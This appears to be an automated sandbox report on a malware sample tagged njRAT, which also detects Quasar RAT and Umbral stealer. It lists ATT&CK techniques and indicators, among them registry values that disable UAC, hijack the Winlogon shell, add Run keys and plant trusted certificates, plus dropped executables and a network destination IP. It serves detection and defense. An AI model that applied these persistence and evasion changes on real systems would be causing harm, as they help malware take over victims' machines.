njrat | c283ed662a29c18b117ba63ac41cca356934c6a29a1eb66e30d8305637e3411b

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Program Files (x86)\\rover\\rover.exe"	Rover.exe

Njrat family
njrat
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 6 IoCs

resource	yara_rule
behavioral1/files/0x000500000001a4bf-212.dat	family_quasar
behavioral1/memory/2832-7545-0x0000000001380000-0x00000000016A4000-memory.dmp	family_quasar
behavioral1/memory/1728-7768-0x0000000000AA0000-0x0000000000DC4000-memory.dmp	family_quasar
behavioral1/memory/2700-9530-0x0000000000E10000-0x0000000001134000-memory.dmp	family_quasar
behavioral1/memory/2236-10029-0x00000000010A0000-0x00000000013C4000-memory.dmp	family_quasar
behavioral1/memory/3380-11102-0x0000000001340000-0x0000000001664000-memory.dmp	family_quasar

UAC bypass 3 TTPs 1 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Rover.exe

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Blocklisted process makes network request 3 IoCs

flow	pid	Process
42	3976	mshta.exe
45	3976	mshta.exe
47	3976	mshta.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
1676	bitsadmin.exe

Manipulates Digital Signatures 1 TTPs 3 IoCs

Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates\C67AD853FB2E9C28D6BE4BE919460BE510646F65\Blob = 0f00000001000000140000006a53ebfbbcf991c343e33908c88fd06308f4e4e30200000001000000cc0000001c0000006c0000000100000000000000000000000000000001000000390038003300350030006400310061002d0033006400370035002d0034006100620031002d0038003800650035002d0034006200300064006100350066006200320064006500610000000000000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000c67ad853fb2e9c28d6be4be919460be510646f65200000000100000000030000308202fc308201e4a003020102021021c0f8b8681654bf4d7612893182aacd300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3235303331393135313033305a180f32313235303232333135313033305a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100b1a24e8a7e44ff75c9b91ff11c74dd411e357002875607145ab07ccb2d13df5a0affcf5035fd46e5f62720a86a13c936d898207592ed6c4ee1e19f8001bb05c6b3649102f6bd5c242fd69aa1ab66f37f7e94e93c9042aa63679bdb4efbcc737b54da6208d73eb2baed6a72402fd790ebea5c102daadba3f5d59b797b1922f6692c6410bc3582f1ffe0e768dbc4c364788d040f34b11d551a5fb10c1fc70f1b4e0960982a202e4f8630d7a491876dfd9fb2a74761a431a00ebe53fab40074ea364c9ef77000be74b1fd2eb993486b0dbd6c825f08269f601dce0c1d03fe0ddb63796a75c8c0d0c3e77d6ad6464c8dcf9f8efffe0e90dd56fad14869658aef5bef0203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e405850414a4f5449590030090603551d1304023000300d06092a864886f70d01010505000382010100323939bad042a9695ebceee7e5dde6b14bc6d2255c75a6522436b0b92619b49f47cedb4c02f22c21c65585dc8a7bc3f4e5fcaa70bdbe463da0ac7baddd8df38b2223e64f2c2eca2ab83e8b8d47c31f3d22781d16329152beb0724e97706c6b0d4bc59cfe6dccab49d889c38fe1af366b89d1e2a9dfc5b9d534c853434992234a37b204fb5dfda1ceed232c5eeded52456e1c27d2fec81caa00f061ae648c027afaf1baabbf245ebc3d50f6fdc081575a70ac3affa57c01c28c6b8fe8dca18c52093fc2b4ec17c7d75cfc8020119ea2d2174f9a5ce5a909a791460f1b47245390dcaf83324abaef82b31ddc5ed7c5041231235ee05835089c69c3b6f77e4235cd	IEXPLORE.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates\C67AD853FB2E9C28D6BE4BE919460BE510646F65\Blob = 0f00000001000000140000006a53ebfbbcf991c343e33908c88fd06308f4e4e3030000000100000014000000c67ad853fb2e9c28d6be4be919460be510646f65200000000100000000030000308202fc308201e4a003020102021021c0f8b8681654bf4d7612893182aacd300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3235303331393135313033305a180f32313235303232333135313033305a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100b1a24e8a7e44ff75c9b91ff11c74dd411e357002875607145ab07ccb2d13df5a0affcf5035fd46e5f62720a86a13c936d898207592ed6c4ee1e19f8001bb05c6b3649102f6bd5c242fd69aa1ab66f37f7e94e93c9042aa63679bdb4efbcc737b54da6208d73eb2baed6a72402fd790ebea5c102daadba3f5d59b797b1922f6692c6410bc3582f1ffe0e768dbc4c364788d040f34b11d551a5fb10c1fc70f1b4e0960982a202e4f8630d7a491876dfd9fb2a74761a431a00ebe53fab40074ea364c9ef77000be74b1fd2eb993486b0dbd6c825f08269f601dce0c1d03fe0ddb63796a75c8c0d0c3e77d6ad6464c8dcf9f8efffe0e90dd56fad14869658aef5bef0203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e405850414a4f5449590030090603551d1304023000300d06092a864886f70d01010505000382010100323939bad042a9695ebceee7e5dde6b14bc6d2255c75a6522436b0b92619b49f47cedb4c02f22c21c65585dc8a7bc3f4e5fcaa70bdbe463da0ac7baddd8df38b2223e64f2c2eca2ab83e8b8d47c31f3d22781d16329152beb0724e97706c6b0d4bc59cfe6dccab49d889c38fe1af366b89d1e2a9dfc5b9d534c853434992234a37b204fb5dfda1ceed232c5eeded52456e1c27d2fec81caa00f061ae648c027afaf1baabbf245ebc3d50f6fdc081575a70ac3affa57c01c28c6b8fe8dca18c52093fc2b4ec17c7d75cfc8020119ea2d2174f9a5ce5a909a791460f1b47245390dcaf83324abaef82b31ddc5ed7c5041231235ee05835089c69c3b6f77e4235cd	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates\C67AD853FB2E9C28D6BE4BE919460BE510646F65\Blob = 0f00000001000000140000006a53ebfbbcf991c343e33908c88fd06308f4e4e3030000000100000014000000c67ad853fb2e9c28d6be4be919460be510646f650200000001000000cc0000001c0000006c0000000100000000000000000000000000000001000000390038003300350030006400310061002d0033006400370035002d0034006100620031002d0038003800650035002d0034006200300064006100350066006200320064006500610000000000000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000200000000100000000030000308202fc308201e4a003020102021021c0f8b8681654bf4d7612893182aacd300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3235303331393135313033305a180f32313235303232333135313033305a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100b1a24e8a7e44ff75c9b91ff11c74dd411e357002875607145ab07ccb2d13df5a0affcf5035fd46e5f62720a86a13c936d898207592ed6c4ee1e19f8001bb05c6b3649102f6bd5c242fd69aa1ab66f37f7e94e93c9042aa63679bdb4efbcc737b54da6208d73eb2baed6a72402fd790ebea5c102daadba3f5d59b797b1922f6692c6410bc3582f1ffe0e768dbc4c364788d040f34b11d551a5fb10c1fc70f1b4e0960982a202e4f8630d7a491876dfd9fb2a74761a431a00ebe53fab40074ea364c9ef77000be74b1fd2eb993486b0dbd6c825f08269f601dce0c1d03fe0ddb63796a75c8c0d0c3e77d6ad6464c8dcf9f8efffe0e90dd56fad14869658aef5bef0203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e405850414a4f5449590030090603551d1304023000300d06092a864886f70d01010505000382010100323939bad042a9695ebceee7e5dde6b14bc6d2255c75a6522436b0b92619b49f47cedb4c02f22c21c65585dc8a7bc3f4e5fcaa70bdbe463da0ac7baddd8df38b2223e64f2c2eca2ab83e8b8d47c31f3d22781d16329152beb0724e97706c6b0d4bc59cfe6dccab49d889c38fe1af366b89d1e2a9dfc5b9d534c853434992234a37b204fb5dfda1ceed232c5eeded52456e1c27d2fec81caa00f061ae648c027afaf1baabbf245ebc3d50f6fdc081575a70ac3affa57c01c28c6b8fe8dca18c52093fc2b4ec17c7d75cfc8020119ea2d2174f9a5ce5a909a791460f1b47245390dcaf83324abaef82b31ddc5ed7c5041231235ee05835089c69c3b6f77e4235cd	IEXPLORE.EXE

Modifies Windows Firewall 2 TTPs 1 IoCs

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3356	netsh.exe

Possible privilege escalation attempt 4 IoCs

exploit

pid	Process
3256	takeown.exe
1888	icacls.exe
2832	takeown.exe
1516	icacls.exe

.NET Reactor proctector 35 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/memory/2000-349-0x0000000005D30000-0x0000000006280000-memory.dmp	net_reactor
behavioral1/memory/2000-370-0x0000000006280000-0x00000000067CE000-memory.dmp	net_reactor
behavioral1/memory/2000-375-0x0000000006280000-0x00000000067C9000-memory.dmp	net_reactor
behavioral1/memory/2000-374-0x0000000006280000-0x00000000067C9000-memory.dmp	net_reactor
behavioral1/memory/2000-383-0x0000000006280000-0x00000000067C9000-memory.dmp	net_reactor
behavioral1/memory/2000-381-0x0000000006280000-0x00000000067C9000-memory.dmp	net_reactor
behavioral1/memory/2000-379-0x0000000006280000-0x00000000067C9000-memory.dmp	net_reactor
behavioral1/memory/2000-377-0x0000000006280000-0x00000000067C9000-memory.dmp	net_reactor
behavioral1/memory/2000-493-0x0000000006280000-0x00000000067C9000-memory.dmp	net_reactor
behavioral1/memory/2000-491-0x0000000006280000-0x00000000067C9000-memory.dmp	net_reactor
behavioral1/memory/2000-489-0x0000000006280000-0x00000000067C9000-memory.dmp	net_reactor
behavioral1/memory/2000-487-0x0000000006280000-0x00000000067C9000-memory.dmp	net_reactor
behavioral1/memory/2000-485-0x0000000006280000-0x00000000067C9000-memory.dmp	net_reactor
behavioral1/memory/2000-483-0x0000000006280000-0x00000000067C9000-memory.dmp	net_reactor
behavioral1/memory/2000-481-0x0000000006280000-0x00000000067C9000-memory.dmp	net_reactor
behavioral1/memory/2000-479-0x0000000006280000-0x00000000067C9000-memory.dmp	net_reactor
behavioral1/memory/2000-397-0x0000000006280000-0x00000000067C9000-memory.dmp	net_reactor
behavioral1/memory/2000-395-0x0000000006280000-0x00000000067C9000-memory.dmp	net_reactor
behavioral1/memory/2000-477-0x0000000006280000-0x00000000067C9000-memory.dmp	net_reactor
behavioral1/memory/2000-475-0x0000000006280000-0x00000000067C9000-memory.dmp	net_reactor
behavioral1/memory/2000-473-0x0000000006280000-0x00000000067C9000-memory.dmp	net_reactor
behavioral1/memory/2000-471-0x0000000006280000-0x00000000067C9000-memory.dmp	net_reactor
behavioral1/memory/2000-469-0x0000000006280000-0x00000000067C9000-memory.dmp	net_reactor
behavioral1/memory/2000-467-0x0000000006280000-0x00000000067C9000-memory.dmp	net_reactor
behavioral1/memory/2000-465-0x0000000006280000-0x00000000067C9000-memory.dmp	net_reactor
behavioral1/memory/2000-463-0x0000000006280000-0x00000000067C9000-memory.dmp	net_reactor
behavioral1/memory/2000-461-0x0000000006280000-0x00000000067C9000-memory.dmp	net_reactor
behavioral1/memory/2000-459-0x0000000006280000-0x00000000067C9000-memory.dmp	net_reactor
behavioral1/memory/2000-457-0x0000000006280000-0x00000000067C9000-memory.dmp	net_reactor
behavioral1/memory/2000-456-0x0000000006280000-0x00000000067C9000-memory.dmp	net_reactor
behavioral1/memory/2000-393-0x0000000006280000-0x00000000067C9000-memory.dmp	net_reactor
behavioral1/memory/2000-391-0x0000000006280000-0x00000000067C9000-memory.dmp	net_reactor
behavioral1/memory/2000-389-0x0000000006280000-0x00000000067C9000-memory.dmp	net_reactor
behavioral1/memory/2000-387-0x0000000006280000-0x00000000067C9000-memory.dmp	net_reactor
behavioral1/memory/2000-385-0x0000000006280000-0x00000000067C9000-memory.dmp	net_reactor

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe	!FIXInj.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe	!FIXInj.exe

Executes dropped EXE 32 IoCs

pid	Process
2000	Rover.exe
1188	Google.exe
1804	regmess.exe
2432	3.exe
2300	1.exe
3156	WinaeroTweaker-1.40.0.0-setup.exe
1932	WinaeroTweaker-1.40.0.0-setup.tmp
3516	psiphon-tunnel-core.exe
2740	the.exe
2832	scary.exe
3496	wimloader.dll
1728	Romilyaa.exe
3932	ac3.exe
3340	Romilyaa.exe
2700	Romilyaa.exe
2236	Romilyaa.exe
280	Romilyaa.exe
3464	freebobux.exe
1940	SolaraBootstraper.exe
2464	wim.dll
3180	CLWCP.exe
4084	SolaraBootstrapper.exe
2692	Umbral.exe
1972	!FIXInj.exe
3380	Romilyaa.exe
2564	Romilyaa.exe
3168	Romilyaa.exe
3044	Romilyaa.exe
3176	Romilyaa.exe
2944	Romilyaa.exe
3940	f3cb220f1aaa32ca310586e5f62dcab1.exe
3464	Romilyaa.exe

Loads dropped DLL 33 IoCs

pid	Process
1668	cmd.exe
1668	cmd.exe
1668	cmd.exe
2324	cmd.exe
2324	cmd.exe
2300	1.exe
2300	1.exe
2476	cmd.exe
3156	WinaeroTweaker-1.40.0.0-setup.exe
1932	WinaeroTweaker-1.40.0.0-setup.tmp
1932	WinaeroTweaker-1.40.0.0-setup.tmp
1932	WinaeroTweaker-1.40.0.0-setup.tmp
1932	WinaeroTweaker-1.40.0.0-setup.tmp
1932	WinaeroTweaker-1.40.0.0-setup.tmp
2432	3.exe
2432	3.exe
1668	cmd.exe
1668	cmd.exe
1668	cmd.exe
3180	Process not Found
1668	cmd.exe
1668	cmd.exe
1668	cmd.exe
1668	cmd.exe
1668	cmd.exe
1668	cmd.exe
1668	cmd.exe
2372	cmd.exe
2372	cmd.exe
1940	SolaraBootstraper.exe
1940	SolaraBootstraper.exe
1940	SolaraBootstraper.exe
1668	cmd.exe

Modifies file permissions 1 TTPs 4 IoCs

File and Directory Permissions Modification

T1222

pid	Process
2832	takeown.exe
1516	icacls.exe
3256	takeown.exe
1888	icacls.exe

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	flow	ioc	pid	Process
Destination IP	79	217.138.199.93	3516	psiphon-tunnel-core.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .."	!FIXInj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .."	!FIXInj.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

defense_evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Rover.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Rover.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000500000001a478-107.dat	autoit_exe
behavioral1/files/0x000500000001a41b-191.dat	autoit_exe
behavioral1/files/0x000500000001a4a8-201.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
2228	tasklist.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

persistence privilege_escalation

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Control Panel\Desktop\Wallpaper = "c:\\temp\\bg.bmp"	CLWCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Control Panel\Desktop\WallPaper = "C:\\Users\\%username%\\Desktop\\t\\a\\bg.png"	reg.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000500000001a4e1-228.dat	upx
behavioral1/files/0x000500000001a486-196.dat	upx
behavioral1/memory/2432-4411-0x0000000001170000-0x0000000002797000-memory.dmp	upx
behavioral1/memory/2432-7466-0x0000000001170000-0x0000000002797000-memory.dmp	upx
behavioral1/memory/3464-10971-0x0000000000400000-0x000000000083E000-memory.dmp	upx
behavioral1/memory/3464-11194-0x0000000000400000-0x000000000083E000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\rover\_2Idle\_2Idle.005.png	Rover.exe
File created	C:\Program Files (x86)\rover\Come\Come.013.png	Rover.exe
File created	C:\Program Files (x86)\rover\_6Idle\_6Idle.008.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\_9Idle\_9Idle.009.png	Rover.exe
File created	C:\Program Files (x86)\rover\Lick\Lick.019.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Reading\Reading.015.png	Rover.exe
File created	C:\Program Files\Winaero Tweaker\is-QPTMN.tmp	WinaeroTweaker-1.40.0.0-setup.tmp
File created	C:\Program Files (x86)\rover\Ashamed\Ashamed.007.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Eat\Eat.077.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\_2Idle\_2Idle.007.png	Rover.exe
File created	C:\Program Files (x86)\rover\_2Idle\_2Idle.012.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\_4Idle\_4Idle.007.png	Rover.exe
File created	C:\Program Files (x86)\rover\_8Idle\_8Idle.008.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\End_Speak\End_Speak.005.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Come\Come.010.png	Rover.exe
File created	C:\Program Files (x86)\rover\Come\Come.014.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Eat\Eat.012.png	Rover.exe
File created	C:\Program Files (x86)\rover\GetAttention\GetAttention.008.png	Rover.exe
File created	C:\Program Files (x86)\rover\_9Idle\_9Idle.019.png	Rover.exe
File created	C:\Program Files (x86)\rover\Sleep\Sleep.002.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Come\Come.015.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Exit\Exit.009.png	Rover.exe
File created	C:\Program Files (x86)\rover\Sleep\Sleep.004.png	Rover.exe
File created	C:\Program Files (x86)\rover\Tired\Tired.004.png	Rover.exe
File created	C:\Program Files (x86)\rover\Speak\Speak.007.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\dag.ico	Rover.exe
File created	C:\Program Files\Winaero Tweaker\is-L6MAQ.tmp	WinaeroTweaker-1.40.0.0-setup.tmp
File created	C:\Program Files (x86)\rover\EN_welcome.txt	Rover.exe
File created	C:\Program Files (x86)\rover\Eat\Eat.050.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\_2Idle\_2Idle.003.png	Rover.exe
File created	C:\Program Files (x86)\rover\_7Idle\_7Idle.007.png	Rover.exe
File created	C:\Program Files (x86)\rover\GetAttention\GetAttention.010.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\_7Idle\_7Idle.004.png	Rover.exe
File created	C:\Program Files (x86)\rover\_9Idle\_9Idle.031.png	Rover.exe
File created	C:\Program Files (x86)\rover\Reading\Reading.009.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Slap\Slap.005.png	Rover.exe
File created	C:\Program Files (x86)\rover\Come\Come.005.png	Rover.exe
File created	C:\Program Files (x86)\rover\Eat\Eat.010.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Eat\Eat.033.png	Rover.exe
File created	C:\Program Files (x86)\rover\_3Idle\_3Idle.010.png	Rover.exe
File created	C:\Program Files (x86)\rover\_9Idle\_9Idle.036.png	Rover.exe
File created	C:\Program Files (x86)\rover\_10Idle\_10Idle.027.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Speak\Speak.006.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Breath.wav	Rover.exe
File created	C:\Program Files (x86)\rover\Reading\Reading.008.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Tap.wav	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\EN_other.txt	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Come\Come.004.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Eat\Eat.035.png	Rover.exe
File created	C:\Program Files (x86)\rover\Eat\Eat.067.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\_10Idle\_10Idle.006.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Ashamed\Ashamed.001.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Reading\Reading.002.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Speak\Speak.014.png	Rover.exe
File created	C:\Program Files (x86)\rover\Eat\Eat.056.png	Rover.exe
File created	C:\Program Files (x86)\rover\Haf\Haf.006.png	Rover.exe
File created	C:\Program Files (x86)\rover\_3Idle\_3Idle.007.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\_10Idle\_10Idle.014.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Ashamed\Ashamed.007.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Eat\Eat.007.png	Rover.exe
File created	C:\Program Files (x86)\rover\Sniff.wav	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Ashamed\Ashamed.014.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Come\Come.009.png	Rover.exe
File created	C:\Program Files (x86)\rover\_10Idle\_10Idle.036.png	Rover.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f3cb220f1aaa32ca310586e5f62dcab1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WinaeroTweaker-1.40.0.0-setup.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SolaraBootstrapper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rover.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
